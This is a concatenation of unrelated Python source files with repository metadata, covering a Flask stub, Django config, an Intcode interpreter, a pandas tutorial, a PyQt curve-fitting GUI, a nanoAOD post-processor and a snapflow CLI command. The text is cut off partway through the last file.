|
23eae59fc3d3515903700740fade1bce8b8d6e12
|
refs/heads/master
| 2021-01-10T08:10:41.056344
| 2016-04-18T08:45:01
| 2016-04-18T08:45:01
| 53,919,940
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 331
|
py
|
# -*- coding: utf-8 -*-
from flask import render_template
from flask import request
from flask import redirect
from flask import url_for
from flask import abort
from flask import flash
from flask import current_app
from pune.service import UserService
from . import bp
@bp.route('/usrs')
def list_users():
return 'nothing'
|
[
"maplevalley8@gmail.com"
] |
maplevalley8@gmail.com
|
66c87d7d3d6df618eec5985290c9a5d2ba36eb39
|
dfaa090887158b35fc19b7274593d78f44658399
|
/Django/mysite9/mysite9/wsgi.py
|
d39d3ab985c3049db075b08a7e9ef7f117e2bb29
|
[] |
no_license
|
Artak2033/Homeworks
|
429c3f5896b6eea52bc6dc7161916afce5d6bd91
|
dbb526ac6ae082b58e58f6204b2106b9ccaf7f58
|
refs/heads/main
| 2023-05-15T14:39:41.992105
| 2021-06-11T12:40:36
| 2021-06-11T12:40:36
| 365,962,275
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
"""
WSGI config for mysite9 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mysite9.settings')
application = get_wsgi_application()
|
[
"akfartak@mail.ru"
] |
akfartak@mail.ru
|
2b8a1159ab224c44e934263a6b9f5090c89352a0
|
47901d3483df111fe9b6f146691e58eecfa09c32
|
/13/intcode.py
|
6254b3853bf9397655b39b018240b3c0a8030a43
|
[] |
no_license
|
matus-pikuliak/advent_2019
|
1861ee4da7c01e038c80eeee1e03353f9907447f
|
67fcf18f66e53e886f945a5cdd7289b9439483db
|
refs/heads/master
| 2020-09-22T10:05:52.879745
| 2019-12-25T19:59:09
| 2019-12-25T19:59:09
| 225,149,977
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,095
|
py
|
class IntCode:
def __init__(self, memory):
self.mem = memory + [0] * 1000
self.pointer = 0
self.rel = 0
def run(self):
while True:
current = f'{self.mem[self.pointer]:05}'
instruction = current[-2:]
if instruction == '99':
break
modes = [
int(mode)
for mode
in current[2::-1]]
ops = []
for i in range(3):
adr = self.pointer + i + 1
if modes[i] == 0:
ops.append(self.mem[adr])
if modes[i] == 1:
ops.append(adr)
if modes[i] == 2:
ops.append(self.mem[adr] + self.rel)
if instruction == '01':
self.mem[ops[2]] = self.mem[ops[0]] + self.mem[ops[1]]
self.pointer += 4
if instruction == '02':
self.mem[ops[2]] = self.mem[ops[0]] * self.mem[ops[1]]
self.pointer += 4
if instruction == '03':
self.mem[ops[0]] = yield -999
yield
self.pointer += 2
if instruction == '04':
yield self.mem[ops[0]]
self.pointer += 2
if instruction == '05':
if self.mem[ops[0]] != 0:
self.pointer = self.mem[ops[1]]
else:
self.pointer += 3
if instruction == '06':
if self.mem[ops[0]] == 0:
self.pointer = self.mem[ops[1]]
else:
self.pointer += 3
if instruction == '07':
self.mem[ops[2]] = int(self.mem[ops[0]] < self.mem[ops[1]])
self.pointer += 4
if instruction == '08':
self.mem[ops[2]] = int(self.mem[ops[0]] == self.mem[ops[1]])
self.pointer += 4
if instruction == '09':
self.rel += self.mem[ops[0]]
self.pointer += 2
|
[
"matus.pikuliak@stuba.sk"
] |
matus.pikuliak@stuba.sk
|
b7c6a2da8d1c2ae74e8a0066ec371a381e31082e
|
cba3d1dd5b08a703c7e9e68464beb741eacfeb0d
|
/003_Pandas_tut.py
|
ca014206033cd06400a9a4ed2d444c451e86699b
|
[] |
no_license
|
Fizztech0/Tutorials
|
480b8973deee83ea19ad197761f5bf1e21c4a169
|
dff855b63834507783494543d0c8d3240d0bf145
|
refs/heads/main
| 2023-06-26T21:51:18.522576
| 2021-07-23T18:53:35
| 2021-07-23T18:53:35
| 388,511,432
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,046
|
py
|
# Dataframe is the Object type that Pandas allows to manipulate
import sys
sys.path.append("/Users/SafetyFirst/Library/Python/3.9/lib/python/site-packages")
# import as = dont have to type pandas everytime, but just pd
import pandas as pd
import numpy as np
# together with importing numpy these four lines of code allow for a wider pycharm terminal output when displaying
# dataframe content
desired_width=320
pd.set_option('display.width', desired_width)
np.set_printoptions(linewidth=desired_width)
pd.set_option('display.max_columns',13)
pd.set_option('display.max_rows', None)
df = pd.read_csv('003_pokemon_data.csv')
#print(df.head(5))
# Reading Data in Pandas
## Read Headers
#print(df.columns)
## Read each Column
#print(df['Name'][0:5])
#print(df.Name)
#print(df[['Name', 'HP']][0:5])
## Read each row
#print(df.iloc[1])
#for index, row in df.iterrows():
# print(index, row)
#for index, row in df.iterrows():
# print(index, row['Name'])
#print(df.loc[df['Type 1'] == "Fire"])
## Read a specific location (R, C)
#print(df.iloc[2, 1])
# Sorting/Describing Data
#print(df.describe())
## ascending sorting by name
#print(df.sort_values('Name'))
##descending sorting
#print(df.sort_values('Name', ascending=False))
## sorting through multiple columns, ascending [1 = True, 0 = False] so first column will be sorted ascending
## and the second descending
#print(df.sort_values(['Type 1', 'HP'], ascending=[1,0]))
##Making Chancges to the data
##Adding a column
#df['Total'] = df['HP'] + df['Attack'] + df['Defense'] + df['Sp. Atk'] + df['Sp. Def'] + df['Speed']
#print(df[0:13])
## when adding totals, doublecheck if numbers match!
## , means all columns
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#print(df)
## be careful with hardcoding numbers as tables change and that can screw everything up
## -> use variables (i.e. Pythons refractor instead of rename option)
## dropping columns
#print(df.drop(columns=['Legendary', 'Generation']))
## reordering data
## 1 just calling the columns you want
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#print(df[['Name', 'Total', 'HP']])
## 2
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#cols = list(df.columns)
#df = df[cols[0:4] + [cols[-1]] + cols[4:10]]
#print(df.head(5))
## saving to csv
## saving the modified file with the added total of all pokemon values and new sorting
##index=False, otherwise it would insert a indexing column at the front, which the df already has
## to csv, excel and TAB separated .txt
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#cols = list(df.columns)
#df = df[cols[0:4] + [cols[-1]] + cols[4:10]]
#df.to_csv('pokemon_data_modified.csv', index=False)
#df.to_excel('pokemon_data_modified.xlsx', index=False)
#df.to_csv('pokemon_data_modified.txt', index=False, sep='\t')
## Filtering data
## filtering by one spec
#print(df.loc[df['Type 1'] == 'Grass'])
## filtering by two specs
## in pandas we use "&" instead of the "and" we'd normally use
## equally "or" is
#new_df = df.loc[(df['Type 1'] == 'Grass') & (df['Type 2'] == 'Poison') & (df['HP'] > 70)]
#print(new_df)
## this will keep the old index, to get rid of it:
#new_df = new_df.reset_index(drop=True)
#select Mega
#new_df.reset_index(drop=True, inplace=True)
#inverse select for non-Mega
#new_df = df.loc[~df["Name"].str.contains('Mega')]
# REGEX segment ommitted
#filtering for either or
#print(df.loc[(df["Type 1"] == "Grass") | (df["Type 1"] == "Fire")])
## Conditional Changes
##changing strings
#df.loc[df["Type 1"] == "Fire", "Type 1"] = "Flamer"
## one condition to set the parameter of another column
#df.loc[df["Type 1"] == "Fire", ["Legendary", "Generation"]] = ["TEST 1", "TEST2"]
## Aggregate Statistics (Groupby)
df['Total'] = df.iloc[:, 4:10].sum(axis=1)
cols = list(df.columns)
df = df[cols[0:4] + [cols[-1]] + cols[4:12]]
#print(df.groupby(["Type 1"]).mean().sort_values("HP", ascending=False))
#print(df.groupby(["Type 1"]).sum())
#print(df.groupby(["Type 1"]).count())
df["count"] = 1
print(df.groupby(["Type 1", "Type 2"]).count()["count"])
#print(df)
|
[
"fizzad@gmail.com"
] |
fizzad@gmail.com
|
52dad76367c862489da289aed0ad49fd4d6a600d
|
b04279709d7133e310cca957f85d9bed259cfbdf
|
/application/settings/develop.py
|
30811838eae0cccaadbe9f5b7702cc17ecb69d46
|
[] |
no_license
|
fujimisakari/otherbu
|
7230de39670815d6d72be13aa293f08a128f13d0
|
d70a0c21858e5d37a3cf3fca81b69ea7f73af661
|
refs/heads/master
| 2022-12-10T17:27:15.411751
| 2019-01-02T18:02:46
| 2019-01-02T18:02:46
| 8,172,410
| 0
| 0
| null | 2022-12-08T00:54:53
| 2013-02-13T03:20:05
|
Python
|
UTF-8
|
Python
| false
| false
| 76
|
py
|
from .base import *
DEBUG = True
TEMPLATE_DEBUG = DEBUG
AUTO_LOGIN = DEBUG
|
[
"fujimisakari@gmail.com"
] |
fujimisakari@gmail.com
|
410f36205d34f73079693b4e026012216b438744
|
459f88ba61bb0200e9906c7ce3c814bdf01bd278
|
/py.py
|
4080d3abf50fdf5ef84cf5c058bddfcf10ff3ffd
|
[] |
no_license
|
iamanx17/Advance-python
|
3c65104997c748c11ff2e322a8665423ca335b34
|
f04baa817667d4d7f628abbefe712f1ea99a3f57
|
refs/heads/main
| 2023-07-07T21:05:38.981879
| 2021-08-12T13:34:33
| 2021-08-12T13:34:33
| 327,520,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 139
|
py
|
print('Updating this file from vscode!!')
print('Experiment code 4550')
print('Doing one more change')
print('Lets see what will happen')
|
[
"32339572+iamanx17@users.noreply.github.com"
] |
32339572+iamanx17@users.noreply.github.com
|
2e57626e4bb2e712bdfee4e51a5d28344f6a7fcf
|
3b0ee58fb38780c9a6a81e9c22686adf03e8bdee
|
/publish-events.py
|
9c259eb82b6768103ae81ea1072461a26677961b
|
[] |
no_license
|
gsherwin3/sonic-nas-manifest
|
7061a0f3534c34cfceb612976ccfc789e3b0e43e
|
4c8fe47374d7a65baecb168b2e9ee654761e295d
|
refs/heads/master
| 2020-06-28T21:03:02.069209
| 2016-10-27T16:22:23
| 2016-10-27T16:22:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 319
|
py
|
# Python code block to publish events
import cps
import cps_utils
# Create handle to connect to event service
handle = cps.event_connect()
# Create CPS object
obj = cps_utils.CPSObject('base-port/interface',qual='observed', data= {"ifindex":23})
# Publish the event
cps.event_send(handle, obj.get())
|
[
"noreply@github.com"
] |
noreply@github.com
|
8b459ea6c51590e42fb2bdf49298dcfd689e92d7
|
612e80dad0b13450fd647b18301cfe3b7dc707e3
|
/SALab2/window.py
|
971507b85c93b4f9260fc36895032aa7e453dd5e
|
[] |
no_license
|
ozhenchuk/SysAn
|
a44f60367ca47cd10c84d3d02bcd073f3bf4427e
|
06d290b1e963794e156c8bc5870103062d92f574
|
refs/heads/master
| 2020-04-11T20:46:01.557157
| 2018-12-17T06:03:55
| 2018-12-17T06:03:55
| 161,516,342
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,537
|
py
|
import matplotlib.pylab as plb
import numpy as np
import sys
import time
##import yaml
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar
import matplotlib.pyplot as plt
from iterator import Iterator
from PyQt4 import QtCore, QtGui
import os
class PlotManager(QtGui.QWidget):
def __init__(self, parent=None):
super(PlotManager, self).__init__(parent)
self.figure = plt.figure ()
self.canvas = FigureCanvas(self.figure)
self.toolbar = NavigationToolbar(self.canvas, self)
self.toolbar.hide()
self.zoombut = QtGui.QPushButton("Збільшити")
self.zoombut.clicked.connect(self.zoom)
self.panbut = QtGui.QPushButton("Перемістити")
self.panbut.clicked.connect(self.pan)
self.homebut = QtGui.QPushButton("Повністю")
self.homebut.clicked.connect(self.home)
self.savebut = QtGui.QPushButton("Зберегти")
self.savebut.clicked.connect(self.save)
layout = QtGui.QVBoxLayout()
buttonbox = QtGui.QHBoxLayout()
buttonbox.addWidget(self.zoombut)
buttonbox.addWidget(self.panbut)
buttonbox.addWidget(self.homebut)
buttonbox.addWidget(self.savebut)
layout.addLayout(buttonbox)
layout.addWidget(self.toolbar)
layout.addWidget(self.canvas)
self.setLayout(layout)
self.ax = self.figure.add_subplot(111)
def home(self):
self.toolbar.home()
def zoom(self):
self.toolbar.zoom()
def pan(self):
self.toolbar.pan()
def save(self):
timestr = time.strftime("%Y%m%d_%H%M%S", time.gmtime())
self.figure.savefig(f'{timestr}.png')
class mainWindow(QtGui.QWidget):
def __init__(self, parent = None):
super(mainWindow, self).__init__(parent)
settings = []
##with open("lang_uk.yaml") as f:
##settings.append(yaml.load(f))
self.polinombox = QtGui.QGroupBox("Задання поліномів")
self.setWindowTitle("Відновлення функціональної залежності")
self.lambdabox = QtGui.QGroupBox("Пошук λ")
self.inputbox = QtGui.QGroupBox("Вхідні та вихідні дані")
self.graphicbox = QtGui.QGroupBox("Графіки")
self.samplevolume = QtGui.QSpinBox()
self.samplevolume.setMinimum(1)
self.samplevolume.setMaximum(1000)
self.samplevolume.setValue(45)
self.samplevolume.setAlignment(QtCore.Qt.AlignLeft)
self.samplevolume.setFixedWidth(100)
self.langwin = QtGui.QComboBox()
self.langwin.addItems(["Українська", "English"])
self.langwin.currentIndexChanged.connect(self.LangChange)
self.langwin.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
langwinlayout = QtGui.QHBoxLayout()
self.langlab = QtGui.QLabel("Мова")
self.langlab.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
self.langlab.setAlignment(QtCore.Qt.AlignLeft)
langwinlayout.addWidget(self.langlab)
langwinlayout.addWidget(self.langwin)
langwinlayout.insertSpacing(1, 40)
langwinlayout.setAlignment(QtCore.Qt.AlignLeft)
self.filename = []
self.filebuttons = []
captions = ["Файл вхідних даних", "Файл результатів"]
filelayout = []
self.filelables = []
filelablelayout = QtGui.QVBoxLayout()
filefieldslayout = QtGui.QVBoxLayout()
namedefault = ['input_data.txt', 'out_results.txt']
for i in range(2):
self.filename.append(QtGui.QLineEdit(namedefault[i]))
self.filename[i].setFixedWidth(100)
self.filename[i].setAlignment(QtCore.Qt.AlignLeft)
self.filebuttons.append(QtGui.QPushButton("Обрати"))
self.filebuttons[i].setFixedWidth(60)
filelayout.append(QtGui.QHBoxLayout())
filelayout[i].addWidget(self.filename[i])
self.filelables.append(QtGui.QLabel(captions[i]))
self.filelables[i].setAlignment(QtCore.Qt.AlignLeft)
filelablelayout.addWidget(self.filelables[i])
filelayout[i].addWidget(self.filebuttons[i])
filefieldslayout.addLayout(filelayout[i])
QtCore.QObject.connect(self.filebuttons[0], QtCore.SIGNAL("clicked()"), self.selectInputFile)
QtCore.QObject.connect(self.filebuttons[1], QtCore.SIGNAL("clicked()"), self.selectOutputFile)
self.samlable = QtGui.QLabel("Обсяг вибірки")
self.samlable.setAlignment(QtCore.Qt.AlignLeft)
filelablelayout.addWidget(self.samlable)
filefieldslayout.addWidget(self.samplevolume)
datalayout = QtGui.QHBoxLayout()
datalayout.addLayout(filelablelayout)
datalayout.addLayout(filefieldslayout)
datalayout.insertSpacing(1, 20)
databox = QtGui.QWidget()
databox.setLayout(datalayout)
databox.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
self.vectorbox = QtGui.QGroupBox("Розмірності вхідних векторів")
vectorlayout = QtGui.QHBoxLayout()
vectorxlayout = QtGui.QVBoxLayout()
vectorylayout = QtGui.QVBoxLayout()
dimensiondefaults = [2, 2, 3, 4]
self.dimensions = []
self.dimensionslayout = []
for i in range(3):
self.dimensionslayout.append(QtGui.QHBoxLayout())
self.dimensions.append(QtGui.QSpinBox())
self.dimensions[i].setMinimum(0)
self.dimensions[i].setMaximum(100)
self.dimensions[i].setValue(dimensiondefaults[i])
dimensionlab = QtGui.QLabel("x" + str(i + 1))
dimensionlab.setAlignment(QtCore.Qt.AlignLeft)
self.dimensionslayout[i].addWidget(dimensionlab)
self.dimensionslayout[i].addWidget(self.dimensions[i])
vectorxlayout.addLayout(self.dimensionslayout[i])
self.dimensionslayout.append(QtGui.QHBoxLayout())
self.dimensions.append(QtGui.QSpinBox())
self.dimensions[3].setMinimum(1)
self.dimensions[3].setMaximum(100)
self.dimensions[3].setValue(dimensiondefaults[3])
dimensionlab = QtGui.QLabel("y")
dimensionlab.setAlignment(QtCore.Qt.AlignLeft)
self.dimensionslayout[3].addWidget(dimensionlab)
self.dimensionslayout[3].addWidget(self.dimensions[3])
vectorylayout.addLayout(self.dimensionslayout[3])
for i in range(2):
vectorylayout.addWidget(QtGui.QLabel(""))
vectorlayout.addLayout(vectorxlayout)
vectorlayout.addLayout(vectorylayout)
self.vectorbox.setLayout(vectorlayout)
self.vectorbox.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
inputlayout = QtGui.QHBoxLayout()
inputlayout.addWidget(databox)
inputlayout.addWidget(self.vectorbox)
self.inputbox.setLayout(inputlayout)
self.polinomdegreebox = QtGui.QGroupBox("Степені поліномів")
self.polinomtype = QtGui.QComboBox()
self.polinomtype.addItems(["Чебишева", "Лежандра", "Лаггера", "Ерміта"])
self.polinomdegree = []
self.polinomdegreelayouts = []
polinomdegreelayout = QtGui.QVBoxLayout()
for i in range(3):
self.polinomdegreelayouts.append(QtGui.QHBoxLayout())
self.polinomdegree.append(QtGui.QSpinBox())
self.polinomdegree[i].setMinimum(0)
self.polinomdegree[i].setValue(3+i)#2*(i+1)+2
polinomdegreelab = QtGui.QLabel("x" + str(i + 1))
self.polinomdegreelayouts[i].addWidget(polinomdegreelab)
self.polinomdegreelayouts[i].addWidget(self.polinomdegree[i])
polinomdegreelayout.addLayout(self.polinomdegreelayouts[i])
self.polinomdegreebox.setLayout(polinomdegreelayout)
polinomlayout = QtGui.QVBoxLayout()
polinomtypelayout = QtGui.QHBoxLayout()
self.polinomlab = QtGui.QLabel("Поліноми")
polinomtypelayout.addWidget(self.polinomlab)
polinomtypelayout.addWidget(self.polinomtype)
polinomtypelayout.insertSpacing(1, 20)
polinomlayout.addLayout(polinomtypelayout)
polinomlayout.addWidget(self.polinomdegreebox)
self.polinombox.setLayout(polinomlayout)
self.lambdamethod = []
self.buttonsys1 = QtGui.QRadioButton("за 1єю системою")
self.lambdamethod.append(self.buttonsys1)
self.buttonsys3 = QtGui.QRadioButton("за 3ма системами")
self.lambdamethod.append(self.buttonsys3)
self.lambdamethod[0].setChecked(True)
lambdamethodlayout = QtGui.QVBoxLayout()
for i in self.lambdamethod:
lambdamethodlayout.addWidget(i)
self.lambdabox.setLayout(lambdamethodlayout)
self.graphics = []
self.graphicstab = QtGui.QTabWidget()
graphiclayout = QtGui.QHBoxLayout()
graphiclayout.addWidget(self.graphicstab)
self.graphicbox.setLayout(graphiclayout)
self.gobutton = QtGui.QPushButton("Розв'язати")
QtCore.QObject.connect(self.gobutton, QtCore.SIGNAL("clicked()"), self.start)
methodlayout = QtGui.QVBoxLayout()
methodlayout.addWidget(self.polinombox)
methodlayout.addWidget(self.lambdabox)
methodlayout.addWidget(self.gobutton)
for i in range(4):
methodlayout.addWidget(QtGui.QLabel(""))
graphicmethodlayout = QtGui.QHBoxLayout()
graphicmethodlayout.addLayout(methodlayout)
graphicmethodlayout.addWidget(self.graphicbox)
mainlayout = QtGui.QVBoxLayout()
mainlayout.addLayout(langwinlayout)
mainlayout.addWidget(self.inputbox)
mainlayout.addLayout(graphicmethodlayout)
self.setLayout(mainlayout)
def selectInputFile(self):
path = str(QtGui.QFileDialog.getOpenFileName(None, "Виберіть файл з вхідними даними", QtCore.QDir.currentPath(), "All (*);;Images (*.png *.jpg)"))
if len(path)>0:
self.filename[0].setText(path)
def selectOutputFile(self):
path = str(QtGui.QFileDialog.getOpenFileName(None, "Виберіть файл для вихідних даних", QtCore.QDir.currentPath(), "All (*);;Images (*.png *.jpg)"))
if not path == []:
self.filename[1].setText(path)
def LangChange(self):
##print("LangChanged")
now = self.langwin.currentIndex()
if now == 1:
self.setWindowTitle("Functional dependency resoration")
self.vectorbox.setTitle("Input vectors dimentions")
self.polinombox.setTitle("Polinoms setting")
self.inputbox.setTitle("Input and output data")
self.lambdabox.setTitle("λ Search")
self.graphicbox.setTitle("Graphics")
self.polinomdegreebox.setTitle("Polinom degrees")
self.langlab.setText("Language")
self.filelables[0].setText("Input data file")
self.filelables[1].setText("Results file")
for i in range(2):
self.filebuttons[i].setText("Select")
self.samlable.setText("Sample size")
self.polinomlab.setText("Polinoms of")
self.buttonsys1.setText("with 1 system")
self.buttonsys3.setText("with 3 systems")
self.gobutton.setText("Solve")
for graphic in self.graphics:
graphic.zoombut.setText("Zoom")
graphic.panbut.setText("Pan")
graphic.homebut.setText("Home")
graphic.savebut.setText("Save")
self.polinomtype.clear()
self.polinomtype.addItems(["Chebyshev", "Legendre", "Lagger", "Hermit"])
if now == 0:
self.setWindowTitle("Відновлення функціональної залежності")
self.vectorbox.setTitle("Розмірності вхідних векторів")
self.polinombox.setTitle("Поліноми")
self.inputbox.setTitle("Вхідні та вихідні дані")
self.lambdabox.setTitle("Пошук λ")
self.graphicbox.setTitle("Графіки")
self.polinomdegreebox.setTitle("Степені поліномів")
self.langlab.setText("Мова")
self.filelables[0].setText("Файл вхідних даних")
self.filelables[1].setText("Файл результатів")
for i in range(2):
self.filebuttons[i].setText("Обрати")
self.samlable.setText("Обсяг вибірки")
self.polinomlab.setText("Задання поліномів")
self.buttonsys1.setText("за 1єю системою")
self.buttonsys3.setText("за 3ма системами")
self.gobutton.setText("Розв'язати")
for graphic in self.graphics:
graphic.zoombut.setText("Збільшити")
graphic.panbut.setText("Перемістити")
graphic.homebut.setText("Повністю")
graphic.savebut.setText("Зберегти")
self.polinomtype.clear()
self.polinomtype.addItems(["Чебишева", "Лежандра", "Лаггера", "Ерміта"])
def start(self):
for widget in self.graphics:
widget.hide()
widget.destroy()
self.graphicstab.clear()
dimensions = [self.dimensions[i].value() for i in range(3)]
degrees = [self.polinomdegree[i].value() for i in range(3)]
if (self.lambdamethod[0].isChecked()):
lambda_flag = 0
else:
lambda_flag = 1
mod = Iterator(self.samplevolume.value(), dimensions, self.dimensions[3].value(), self.filename[0].text(), self.polinomtype.currentIndex(), degrees, lambda_flag)
mod.normalization()
n_array = np.arange(float(self.samplevolume.value()))
ydim = self.dimensions[3].value()
for i in range(ydim):
self.graphics.append(PlotManager(self))
self.graphicstab.addTab(self.graphics[i], 'Y'+str(i))
for i in range(ydim):
self.graphics.append(PlotManager(self))
self.graphicstab.addTab(self.graphics[ydim+i], 'res'+str(i))
mod.approximate(self.filename[1].text())
mod.denormalization()
for i in range(ydim):
self.graphics[i].ax.clear()
self.graphics[i].ax.set_facecolor('#dddddd')
self.graphics[i].ax.plot(n_array, mod.y[i], 'b', n_array, mod.y_cnt[i], '#D53206') ##0707FA082A6A
self.graphics[i].canvas.draw()
for i in range(ydim):
resid = (mod.y[i] - mod.y_cnt[i])/max(mod.y[i])
for j in range(len(resid)):
resid[j] = np.fabs(resid[j])
print(mod.y[i], mod.y_cnt[i], resid)
self.graphics[ydim+i].ax.clear()
self.graphics[ydim+i].ax.set_facecolor('#dddddd')
self.graphics[ydim+i].ax.plot(n_array, resid, '#0D6806')
self.graphics[ydim+i].canvas.draw()
app = QtGui.QApplication(sys.argv)
window = mainWindow()
window.show()
sys.exit(app.exec_())
|
[
"noreply@github.com"
] |
noreply@github.com
|
a87bf5f31c6025305ca0fd7c72b461abad7671a5
|
b2075a92c3854c921a95673a3c5ebb424ab08112
|
/python/postprocessing/framework/postprocessor.py
|
9eb1775d8dbd0f52159a9b31d8202b7f33272466
|
[] |
no_license
|
vhbb/nanoAOD-tools
|
cd2a6305991369948bb9577c5da3c7e4db275c52
|
14bce3dca68288e65b2daefce755d65914a3765d
|
refs/heads/master
| 2021-09-04T21:44:29.892241
| 2018-01-22T12:50:50
| 2018-01-22T12:50:50
| 106,291,673
| 1
| 1
| null | 2018-01-22T12:50:51
| 2017-10-09T14:06:47
|
Python
|
UTF-8
|
Python
| false
| false
| 4,843
|
py
|
#!/usr/bin/env python
import os
import time
import ROOT
ROOT.PyConfig.IgnoreCommandLineOptions = True
from PhysicsTools.NanoAODTools.postprocessing.framework.branchselection import BranchSelection
from PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import InputTree
from PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import eventLoop
from PhysicsTools.NanoAODTools.postprocessing.framework.output import FriendOutput, FullOutput
from PhysicsTools.NanoAODTools.postprocessing.framework.preskimming import preSkim
from PhysicsTools.NanoAODTools.postprocessing.framework.jobreport import JobReport
class PostProcessor :
def __init__(self,outputDir,inputFiles,cut=None,branchsel=None,modules=[],compression="LZMA:9",friend=False,postfix=None,
jsonInput=None,noOut=False,justcount=False,provenance=False,haddFileName=None,fwkJobReport=False):
self.outputDir=outputDir
self.inputFiles=inputFiles
self.cut=cut
self.modules=modules
self.compression=compression
self.postfix=postfix
self.json=jsonInput
self.noOut=noOut
self.friend=friend
self.justcount=justcount
self.provenance=provenance
self.jobReport = JobReport() if fwkJobReport else None
self.haddFileName=haddFileName
if self.jobReport and not self.haddFileName :
print "Because you requested a FJR we assume you want the final hadd. No name specified for the output file, will use tree.root"
self.haddFileName="tree.root"
self.branchsel = BranchSelection(branchsel) if branchsel else None
def run(self) :
if not self.noOut:
outpostfix = self.postfix if self.postfix != None else ("_Friend" if self.friend else "_Skim")
if self.compression != "none":
ROOT.gInterpreter.ProcessLine("#include <Compression.h>")
(algo, level) = self.compression.split(":")
compressionLevel = int(level)
if algo == "LZMA": compressionAlgo = ROOT.ROOT.kLZMA
elif algo == "ZLIB": compressionAlgo = ROOT.ROOT.kZLIB
else: raise RuntimeError("Unsupported compression %s" % algo)
else:
compressionLevel = 0
print "Will write selected trees to "+self.outputDir
if not self.justcount:
if not os.path.exists(self.outputDir):
os.system("mkdir -p "+self.outputDir)
if self.noOut:
if len(self.modules) == 0:
raise RuntimeError("Running with --noout and no modules does nothing!")
for m in self.modules: m.beginJob()
fullClone = (len(self.modules) == 0)
outFileNames=[]
t0 = time.clock()
totEntriesRead=0
for fname in self.inputFiles:
# open input file
inFile = ROOT.TFile.Open(fname)
#get input tree
inTree = inFile.Get("Events")
totEntriesRead+=inTree.GetEntries()
# pre-skimming
elist,jsonFilter = preSkim(inTree, self.json, self.cut)
if self.justcount:
print 'Would select %d entries from %s'%(elist.GetN() if elist else inTree.GetEntries(), fname)
continue
else:
print 'Pre-select %d entries out of %s '%(elist.GetN() if elist else inTree.GetEntries(),inTree.GetEntries())
if fullClone:
# no need of a reader (no event loop), but set up the elist if available
if elist: inTree.SetEntryList(elist)
else:
# initialize reader
inTree = InputTree(inTree, elist)
# prepare output file
outFileName = os.path.join(self.outputDir, os.path.basename(fname).replace(".root",outpostfix+".root"))
outFile = ROOT.TFile.Open(outFileName, "RECREATE", "", compressionLevel)
outFileNames.append(outFileName)
if compressionLevel: outFile.SetCompressionAlgorithm(compressionAlgo)
# prepare output tree
if self.friend:
outTree = FriendOutput(inFile, inTree, outFile)
else:
outTree = FullOutput(inFile, inTree, outFile, branchSelection = self.branchsel, fullClone = fullClone, jsonFilter = jsonFilter,provenance=self.provenance)
# process events, if needed
if not fullClone:
(nall, npass, timeLoop) = eventLoop(self.modules, inFile, outFile, inTree, outTree)
print 'Processed %d preselected entries from %s (%s entries). Finally selected %d entries' % (nall, fname, inTree.GetEntries(), npass)
else:
print 'Selected %d entries from %s' % (outTree.tree().GetEntries(), fname)
# now write the output
outTree.write()
outFile.Close()
print "Done %s" % outFileName
if self.jobReport:
self.jobReport.addInputFile(fname,nall)
for m in self.modules: m.endJob()
print totEntriesRead/(time.clock()-t0), "Hz"
if self.haddFileName :
os.system("./haddnano.py %s %s" %(self.haddFileName," ".join(outFileNames))) #FIXME: remove "./" once haddnano.py is distributed with cms releases
if self.jobReport :
self.jobReport.addOutputFile(self.haddFileName)
self.jobReport.save()
|
[
"andrea.rizzi@cern.ch"
] |
andrea.rizzi@cern.ch
|
d8df3e108eb2a60fcac671fff7ece2212a4fd8a5
|
f0e11aeb7b5bd96c828cf39728eb2fa523f320df
|
/snapflow/cli/commands/generate.py
|
10a6882c60f47d5c9c2a9a96f8435d9b031bb621
|
[
"BSD-3-Clause"
] |
permissive
|
sathya-reddy-m/snapflow
|
7bc1fa7de7fd93b81e5b0538ba73ca68e9e109db
|
9e9e73f0d5a3d6b92f528ef1e2840ad92582502e
|
refs/heads/master
| 2023-05-01T05:14:08.479073
| 2021-05-21T00:14:56
| 2021-05-21T00:14:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,840
|
py
|
from __future__ import annotations
import os
from snapflow.cli.commands.base import SnapflowCommandBase
import sys
from contextlib import contextmanager
from importlib import import_module
from pathlib import Path
from types import ModuleType
from typing import List, Pattern
from cleo import Command
from snapflow.core.declarative.dataspace import DataspaceCfg
from snapflow.templates.generator import generate_template, insert_into_file
def strip_snapflow(s: str) -> str:
if s.startswith("snapflow_"):
return s[9:]
return s
class GenerateCommand(SnapflowCommandBase, Command):
"""
Generate new snapflow component
new
{type : Type of component to generate (module, dataspace, function, schema, or flow)}
{name : name of the component }
{--s|namespace : namespace of the component, defaults to current module namespace }
"""
def handle(self):
# self.import_current_snapflow_module()
type_ = self.argument("type")
name = self.argument("name")
namespace = self.option("namespace")
try:
getattr(self, f"handle_{type_}")(name, namespace)
except AttributeError:
raise ValueError(
f"Invalid type {type_}, must be one of (module, dataspace, flow, function, schema)"
)
def handle_module(self, name: str, namespace: str):
namespace = namespace or name
generate_template(
"module", namespace=namespace, name=name,
)
# generate_template("tests", py_module_name=py_module_name, module_name=name)
def handle_dataspace(self, name: str, namespace: str):
name = namespace or name
generate_template(
